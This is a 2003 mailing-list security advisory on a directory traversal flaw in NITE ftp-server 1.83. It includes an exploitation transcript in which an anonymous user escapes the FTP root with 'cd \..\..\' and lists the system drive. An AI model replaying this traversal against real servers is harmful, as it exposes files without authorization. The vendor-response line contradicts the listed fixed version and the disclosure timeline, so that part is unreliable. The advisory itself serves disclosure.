Vulnwatch mailing list archives

Directory traversal vulnerabilities found in NITE ftp-server version 1.83


From: matrix () infowarfare dk
Date: Wed, 15 Jan 2003 13:10:46 +0100

                 Directory traversal vulnerabilities found in 
                        NITE ftp-server version 1.83
                                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY

The NiteServer is a simple FTP-Server program with some special features.
It is free and easy to use.
The following commands are recognized:
USER PORT RETR REST
PASS STOR CWD DELE 
HELP LIST
so it should work with any usual ftp-client.
Special Download-Ratio features are implemented.
User-logins are logged with their IP-Number, so the Up/Download-Ratio
will be held for the future. Spy users, watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming?
Do you need some different features?
You can purchase the source-code (VB 6.0) from the Author.
Simply send a check about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to
cause the server to traverse into directories that reside outside the bounding
FTP root directory.

DETAILS

Vulnerable systems:
 * Niteserver Version:1.83 - Author:Thomas Krebs
   (tested on Windows NT 4.0 and Windows 2000 Server, fully patched)

Immune systems:
 * NiteServer version 1.85

NiteServer's failure to filter out "\.." sequences in command requests allows
remote users to break out of the restricted directory and gain read access
to the system directory structure, making it possible to discover the
directory layout outside the configured FTP areas.


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:

Connected to 192.168.1.22.
220-  Niteserver Version:1.83
220-  Author:Thomas Krebs
220-  email: turtie () knuut de
220- Welcome to the  Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x  1 User     Group              0 Dec 30 15:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Dec 24 00:08 TEMP
drwxr-xr-x  1 User     Group              0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is
available from come.to/niteserversite


Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie () knuut de)
01/13/2003 No Responses received from turtie () knuut de
01/13/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by Dennis Rand (matrix () infowarfare dk)

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.



